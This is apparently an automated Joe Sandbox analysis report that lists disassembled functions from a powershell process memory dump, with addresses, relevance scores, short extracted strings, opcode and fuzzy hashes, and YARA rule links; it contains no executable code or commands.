                                                                                                    • Instruction ID: 8b5591e4df3a80abb4d3a3071513bdc88851399caeb39ab72d990f3e04539739
                                                                                                    • Opcode Fuzzy Hash: 5611588f8d90b28136682d1f0413368d42209a36daacf20773d8fb4209ff5e37
                                                                                                    • Instruction Fuzzy Hash: CB8126F4A00205DFEB14CF58C585A99BBB2FF88324F1580A9E905AB755CB32ED41DF61
                                                                                                    Function 07B4707E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x.hk
                                                                                                    • API String ID: 0-3394790906
                                                                                                    • Opcode ID: 4fb887fbef47533491f8849a86e4d119dc1059b92a30fa7c00bdf0cfc097f0c6
                                                                                                    • Instruction ID: adf043ff5d9fb853a64ba0d3639c36abc77b3c3d7fa7a59303b4585a5c8ba4c3
                                                                                                    • Opcode Fuzzy Hash: 4fb887fbef47533491f8849a86e4d119dc1059b92a30fa7c00bdf0cfc097f0c6
                                                                                                    • Instruction Fuzzy Hash: 3631A7B4B401049FDB14ABA8C955BAF7AB3EF84310F148468EA016F791CF75AC458BE1
                                                                                                    Function 07B4E13C Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq
                                                                                                    • API String ID: 0-2007657732
                                                                                                    • Opcode ID: 3955bb49093dda887c45faac1e3a70bf727946a80bfa53090e46e0cb5b102b1d
                                                                                                    • Instruction ID: 404307924de076e1ebc7d933d602a592e77ad4a9d3e6d3f43b679fb83c9e35e3
                                                                                                    • Opcode Fuzzy Hash: 3955bb49093dda887c45faac1e3a70bf727946a80bfa53090e46e0cb5b102b1d
                                                                                                    • Instruction Fuzzy Hash: 4531E5F1A402129FEF245A7445017797AB2FF81740F2840EDD901DF291EB35C941EBA6
                                                                                                    Function 07B40AB8 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2db7bf3dc16e7de9bfa006a3f3ee53fb74fd9b61f0eb9f169d63ee88b82ab4f6
                                                                                                    • Instruction ID: 93be35e2c99a81fb4255d74a6d03a78aa23050ae071b02e9894d350ed6005e4b
                                                                                                    • Opcode Fuzzy Hash: 2db7bf3dc16e7de9bfa006a3f3ee53fb74fd9b61f0eb9f169d63ee88b82ab4f6
                                                                                                    • Instruction Fuzzy Hash: 78F02BF1600616EFD3185E1894C0567B7EAFF85398734C96DD45417A40C731BCC1DB94

                                                                                                    Non-executed Functions

                                                                                                    Function 07B485D8 Relevance: 21.7, Strings: 17, Instructions: 491COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$84ul$84ul$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-382920908
                                                                                                    • Opcode ID: 01892aa4580fe49ee2e991603a32aebcf72f0b5a3097a349720220f4f13bf663
                                                                                                    • Instruction ID: eee41edd4c2c61bc26d2c03cdd91b086f695255826f66abd08e548763bbda3b7
                                                                                                    • Opcode Fuzzy Hash: 01892aa4580fe49ee2e991603a32aebcf72f0b5a3097a349720220f4f13bf663
                                                                                                    • Instruction Fuzzy Hash: ADF10AF1B04219DFEB258F69C44467BBBA6FF85310F14C0EAD5198B251DB31D881EBA1
                                                                                                    Function 07B49B15 Relevance: 19.0, Strings: 15, Instructions: 285COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$84ul$84ul$84ul$84ul$tPfq$tPfq$tPfq$tPfq$$fq$(lq$(lq$(lq$(lq
                                                                                                    • API String ID: 0-430768251
                                                                                                    • Opcode ID: 201ec5f7ca6299088120a41ed8c0ca5cb3d0eae437486f789f344ab793516708
                                                                                                    • Instruction ID: c10b22354882852f05a76b53e7c5c457ef8fcab76f9ffb4324b6d6ed499f77de
                                                                                                    • Opcode Fuzzy Hash: 201ec5f7ca6299088120a41ed8c0ca5cb3d0eae437486f789f344ab793516708
                                                                                                    • Instruction Fuzzy Hash: 87A1E7F17001199FEF24DFA8C94566BBBA2EB85710F1484D9E8019B291DB31FC41EBA1
                                                                                                    Function 07B4DB90 Relevance: 16.7, Strings: 13, Instructions: 454COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Tgk$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$DUgk$XYwl$XYwl$$fq$$fq$$fq
                                                                                                    • API String ID: 0-2790179083
                                                                                                    • Opcode ID: 0e6c1539fe79cf185be8c1be9151520f5f1ab937feef5d94f5f0e02a838554af
                                                                                                    • Instruction ID: 8802c013af997eeb4174feecf341da2f3871a011fe2aeb81be1dc7bb5bf40464
                                                                                                    • Opcode Fuzzy Hash: 0e6c1539fe79cf185be8c1be9151520f5f1ab937feef5d94f5f0e02a838554af
                                                                                                    • Instruction Fuzzy Hash: 30E1F8F1B042098FEF259F68C4456AABBA2EF86310F14C0EAD655CF652DB31DC41DBA1
                                                                                                    Function 07B42128 Relevance: 12.8, Strings: 10, Instructions: 307COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-1802041116
                                                                                                    • Opcode ID: 9caa200f7e6dcbc0785f7ce46c5e2a4c3e5078d94c0001e111d7cafcc67b8ecc
                                                                                                    • Instruction ID: 155a51cbf8ab78e0b26c5147bb673e64ac96478a70ce9708f811c8f30d62dbb0
                                                                                                    • Opcode Fuzzy Hash: 9caa200f7e6dcbc0785f7ce46c5e2a4c3e5078d94c0001e111d7cafcc67b8ecc
                                                                                                    • Instruction Fuzzy Hash: A2A127F17142169FEB258A7988516FA7BA6FF81250F1480FAF541CB291DF31C881F7A2
                                                                                                    Function 07B418C8 Relevance: 12.8, Strings: 10, Instructions: 306COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3767066038
                                                                                                    • Opcode ID: 606fb653afca52078f7080f04a06f65be78a786253108377f70a51db77dcad68
                                                                                                    • Instruction ID: 1df34e98809f4a5504e19058d1e4e962e4910c693e9ef304ab4ff897d811ed65
                                                                                                    • Opcode Fuzzy Hash: 606fb653afca52078f7080f04a06f65be78a786253108377f70a51db77dcad68
                                                                                                    • Instruction Fuzzy Hash: 7FA12AF2F0021D9FEB249E6DC8416ABBBA3EF85310F14C0AAD5559B281DF31D981DB91
                                                                                                    Function 07B49897 Relevance: 12.6, Strings: 10, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$84ul$84ul$TQkq$TQkq$tPfq$tPfq$$fq$$fq
                                                                                                    • API String ID: 0-4096800185
                                                                                                    • Opcode ID: 0627c41b6dfe97ee7b52d05c8d2d8fded97fad0084483f9cfc5add4d872017a4
                                                                                                    • Instruction ID: 782778042f08744007d7cc18c412d6107770dd5199d85ef207db95f5bde47da4
                                                                                                    • Opcode Fuzzy Hash: 0627c41b6dfe97ee7b52d05c8d2d8fded97fad0084483f9cfc5add4d872017a4
                                                                                                    • Instruction Fuzzy Hash: 5E41C4F1A00209DFEB25DF58C8456AB77A6FB89710F1484D9E9416B384CB31EC41D7A2
                                                                                                    Function 07B4D378 Relevance: 11.4, Strings: 9, Instructions: 191COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$4'fq$4'fq$4tl$4tl$tLik
                                                                                                    • API String ID: 0-350862496
                                                                                                    • Opcode ID: 739ca8968a14c2ad2ea627818928dc36b4a9ba9bbe80b86ab6079714f421285f
                                                                                                    • Instruction ID: 5a7711324200f94a16a247cd8de2dc228aa2c86fe46a99c93bfb4a145298e613
                                                                                                    • Opcode Fuzzy Hash: 739ca8968a14c2ad2ea627818928dc36b4a9ba9bbe80b86ab6079714f421285f
                                                                                                    • Instruction Fuzzy Hash: E961B3F0B00209DFDB24CBA8C451A6ABBE3EF88714F1484A9D6059B754CF31EC41DB92
                                                                                                    Function 07B47238 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-519931695
                                                                                                    • Opcode ID: a0d92e1272682df088362598f5d623f48d095eb5cf10ee8ffb664e0c1fc05efa
                                                                                                    • Instruction ID: c4e6505a2376a2a18710615fd74896fc3899230f971476cc7386ebcb524023e1
                                                                                                    • Opcode Fuzzy Hash: a0d92e1272682df088362598f5d623f48d095eb5cf10ee8ffb664e0c1fc05efa
                                                                                                    • Instruction Fuzzy Hash: 50C171F0E10209DFEF24DBA8C951A6ABBA2EF85714F14C4A9D8059B744DF31EC41DB91
                                                                                                    Function 07B4EA5D Relevance: 10.3, Strings: 8, Instructions: 254COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$84ul$84ul$tPfq$tPfq$tPfq$tPfq
                                                                                                    • API String ID: 0-196553006
                                                                                                    • Opcode ID: 7b89ba1189554f4f1edb1a47363e4ea1082e95dd338ab0129257b09dcaeee094
                                                                                                    • Instruction ID: 7cb930e2c8d1299f6c2f5e05a62bd6ce206af9db52c238f7769af6275dfa3152
                                                                                                    • Opcode Fuzzy Hash: 7b89ba1189554f4f1edb1a47363e4ea1082e95dd338ab0129257b09dcaeee094
                                                                                                    • Instruction Fuzzy Hash: 8E91D6F1B002159FEB24DF68C445A6EBBE2FF89310F188899E9069B391CB31DD41DB91
                                                                                                    Function 07B4A595 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$XRkq$XRkq$XRkq$tPfq$tPfq$$fq
                                                                                                    • API String ID: 0-2074613302
                                                                                                    • Opcode ID: 785ae6de1bfd12da66009315e14d231421d685103329cc1a5f9110eae3cffbc7
                                                                                                    • Instruction ID: 9d46a572b381358906bdd94caddab41c30681064564cfd26a6c7734dabf32950
                                                                                                    • Opcode Fuzzy Hash: 785ae6de1bfd12da66009315e14d231421d685103329cc1a5f9110eae3cffbc7
                                                                                                    • Instruction Fuzzy Hash: E9612AF1B401059FEB259FA885406AABBF2FF89710F24C0A9E9419F391CB35DC41DBA1
                                                                                                    Function 07B4CD96 Relevance: 7.8, Strings: 6, Instructions: 331COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4'fq$x.hk$-hk
                                                                                                    • API String ID: 0-3495770889
                                                                                                    • Opcode ID: 8e26a3af981fe1050a89080e75784df034a17c0210168feefc7c949cfec85b5f
                                                                                                    • Instruction ID: bf0e193f115fdf8c0b35fddc8211d42e9e463c73844c9d3aff0815a6c0826759
                                                                                                    • Opcode Fuzzy Hash: 8e26a3af981fe1050a89080e75784df034a17c0210168feefc7c949cfec85b5f
                                                                                                    • Instruction Fuzzy Hash: 81C1B2F0B002059FEB24DFA4C554BAEBBF2FF84710F14849AD9016B784CB35AC469BA5
                                                                                                    Function 07B4CDE0 Relevance: 7.8, Strings: 6, Instructions: 299COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4'fq$x.hk$-hk
                                                                                                    • API String ID: 0-3495770889
                                                                                                    • Opcode ID: 96781a7b7d1669d0d2a363e89c67ddbf3913adc823ecf5a116dfb6caf74b4e63
                                                                                                    • Instruction ID: e9b7780f8624a58572e3d0892e2c9409f1f84ba47d943d8ebfd3a1c784a5ae7d
                                                                                                    • Opcode Fuzzy Hash: 96781a7b7d1669d0d2a363e89c67ddbf3913adc823ecf5a116dfb6caf74b4e63
                                                                                                    • Instruction Fuzzy Hash: D8C1B1F0B00205DFEB24DF94C554BAEBBB2FF84710F148499EA056B744CB71AC469BA5
                                                                                                    Function 07B4C089 Relevance: 7.7, Strings: 6, Instructions: 223COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$j$x.hk$-hk
                                                                                                    • API String ID: 0-261883319
                                                                                                    • Opcode ID: 988cf1bba793c23eb7707fa922526937b1b5f1ee39965350544cc2a081202e20
                                                                                                    • Instruction ID: f2629335231977388125c0a7e6bfa1450688b12768e600d03c7be7aff23efc08
                                                                                                    • Opcode Fuzzy Hash: 988cf1bba793c23eb7707fa922526937b1b5f1ee39965350544cc2a081202e20
                                                                                                    • Instruction Fuzzy Hash: 01A16CB0A00219CFDB64DB68C955BEEBBB2FB45700F1080E5D5096B781CB75AE81DFA1
                                                                                                    Function 07B49F25 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$tPfq$tPfq$$fq
                                                                                                    • API String ID: 0-1120010701
                                                                                                    • Opcode ID: 3652a4b4feda0354d0a7a3c92fff88031e8043be4a4d1ea9b0d43ed0a86ead5b
                                                                                                    • Instruction ID: fb18e3b3d66be89cf4a353acd7a4822cd84ae07d6b049d6a90c849841178215a
                                                                                                    • Opcode Fuzzy Hash: 3652a4b4feda0354d0a7a3c92fff88031e8043be4a4d1ea9b0d43ed0a86ead5b
                                                                                                    • Instruction Fuzzy Hash: 736106F1B401059FEB149FA885446ABBBF2EF85710F14C0A9D9059F391CB32ED41DBA1
                                                                                                    Function 07B4D35B Relevance: 6.4, Strings: 5, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4tl$tLik
                                                                                                    • API String ID: 0-3341839806
                                                                                                    • Opcode ID: 0c4b80bd7b3e9afddfe9f97ef1cf7bdce5dbd1e12c6a0893fd93f5f30f4add01
                                                                                                    • Instruction ID: ddaea7c70784499c53cd95a8bd86207fc8cf6fd9c96dce205d85ac488531aa47
                                                                                                    • Opcode Fuzzy Hash: 0c4b80bd7b3e9afddfe9f97ef1cf7bdce5dbd1e12c6a0893fd93f5f30f4add01
                                                                                                    • Instruction Fuzzy Hash: 6051B0F0B00205DFEB24CF58C451BAABBB2EF89714F1485A9E505AB755CB32EC41DB92
                                                                                                    Function 07B418A9 Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$tPfq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3445244938
                                                                                                    • Opcode ID: cb4f62fd1c5cf3032f87412ca1efebee5bc150ab597c449187f946bf8a94a648
                                                                                                    • Instruction ID: 38f77e18c3b3406701cd8b7bc544bb8eb0207ef4f0ac3d02965e1378c4fa91dc
                                                                                                    • Opcode Fuzzy Hash: cb4f62fd1c5cf3032f87412ca1efebee5bc150ab597c449187f946bf8a94a648
                                                                                                    • Instruction Fuzzy Hash: C641C2F2E0824DAFEB25CE5DC9407A67BB2EF45210F1880EAD4559B192C731D9C1EBA1
                                                                                                    Function 07B495E4 Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3759051638
                                                                                                    • Opcode ID: 5288f263553fdf3ab4ed6870d48ca6016c0686bd53c5d5b3912fa3be33dac7c7
                                                                                                    • Instruction ID: 41ec47e9508808b7725092d6f2b6c9f3acf716ec7f4437743aa7917f98ec89b2
                                                                                                    • Opcode Fuzzy Hash: 5288f263553fdf3ab4ed6870d48ca6016c0686bd53c5d5b3912fa3be33dac7c7
                                                                                                    • Instruction Fuzzy Hash: 7B3155F6B04256DFEF254EB98850677B7A6EF86210B2440EEC452C7281DF31E851EB62
                                                                                                    Function 07B43ECD Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3759051638
                                                                                                    • Opcode ID: 74dd434c7ca35491bb69e68e0abe1509434d3309da1a99d0b5321ad74da9ad7d
                                                                                                    • Instruction ID: bbdc189a63c7797ec31b47d8ba849099e29b40db17e7cb85a99c848957588dab
                                                                                                    • Opcode Fuzzy Hash: 74dd434c7ca35491bb69e68e0abe1509434d3309da1a99d0b5321ad74da9ad7d
                                                                                                    • Instruction Fuzzy Hash: 933126F2704287CFEF254B649454177B7F6EF86220B2C80EBD94597281DB36C851E762
                                                                                                    Function 07B4E32A Relevance: 6.3, Strings: 5, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tPfq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3108386057
                                                                                                    • Opcode ID: 45c32f5e6a46e858e7dc064a797f6f5bee50359c36ef07fbd274cf26dbac44cd
                                                                                                    • Instruction ID: 593f84c7cd013cc6319abeb7420df55a6e0d9aa7740bfd95083155e39d6c7dc7
                                                                                                    • Opcode Fuzzy Hash: 45c32f5e6a46e858e7dc064a797f6f5bee50359c36ef07fbd274cf26dbac44cd
                                                                                                    • Instruction Fuzzy Hash: 002136F2600316DFFB228F64C54097AB7B8FF40A61F1841EAE8049B392C731D840D7A2
                                                                                                    Function 07B400F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $fq$$fq$$fq$ml$ml
                                                                                                    • API String ID: 0-2511417846
                                                                                                    • Opcode ID: 3473566a32f6ddad377199ac6cef1e59cc9557dc262b16561ecf86af8c334110
                                                                                                    • Instruction ID: 992e8b2869fbfe8d9606181bed21c4d45fb29ecf1dfc4136a3e70bd3c496d041
                                                                                                    • Opcode Fuzzy Hash: 3473566a32f6ddad377199ac6cef1e59cc9557dc262b16561ecf86af8c334110
                                                                                                    • Instruction Fuzzy Hash: 10112CF13042069BFB24696AC801727B77BEBC1750F2480EAF64587281E931D440D351
                                                                                                    Function 07B48C28 Relevance: 5.5, Strings: 4, Instructions: 487COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ofq$(ofq$(ofq$(ofq
                                                                                                    • API String ID: 0-875029461
                                                                                                    • Opcode ID: f8b03e9249e3c22d7b8fdd2ec0b85669a9851ccfd1b51c57ce12f48605142384
                                                                                                    • Instruction ID: 1c12877ef178708efdbaf20915d9ca909d2aa8caa8cf9dc420c82649c3297735
                                                                                                    • Opcode Fuzzy Hash: f8b03e9249e3c22d7b8fdd2ec0b85669a9851ccfd1b51c57ce12f48605142384
                                                                                                    • Instruction Fuzzy Hash: B8F105F17043469FEF258F69C855BABBBA2EF81310F1480AAE515CB292CB31D841D7A1
                                                                                                    Function 07B4D630 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2555649572
                                                                                                    • Opcode ID: 9dddf92988c6d9d3ae3fd284959c19a04a1beef6c7830b8568cc4f116cf80a6e
                                                                                                    • Instruction ID: d664c95e63fe9ff374195d3469b1d2b6f0d1f005de906a6f4aff6d9d1182391b
                                                                                                    • Opcode Fuzzy Hash: 9dddf92988c6d9d3ae3fd284959c19a04a1beef6c7830b8568cc4f116cf80a6e
                                                                                                    • Instruction Fuzzy Hash: DCF170F1B00209DFDB24CBA8C551A6AB7B2FF89314F14C1A9DA15AB744CB72EC41DB91
                                                                                                    Function 07B47214 Relevance: 5.3, Strings: 4, Instructions: 277COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2555649572
                                                                                                    • Opcode ID: 91eca7fa1e15d97e1c1287665c811319456fd00c00e83eb6fd654ed05e96485d
                                                                                                    • Instruction ID: f129362d34b32f1836c10cce3f17750b4310dda374ef7294577d43c0e4c1e45c
                                                                                                    • Opcode Fuzzy Hash: 91eca7fa1e15d97e1c1287665c811319456fd00c00e83eb6fd654ed05e96485d
                                                                                                    • Instruction Fuzzy Hash: CBB190F1E00206DFEF24CF94C940AAABBB2FF85314F14C59AD845AB645CB31E846DB91
                                                                                                    Function 07B47670 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
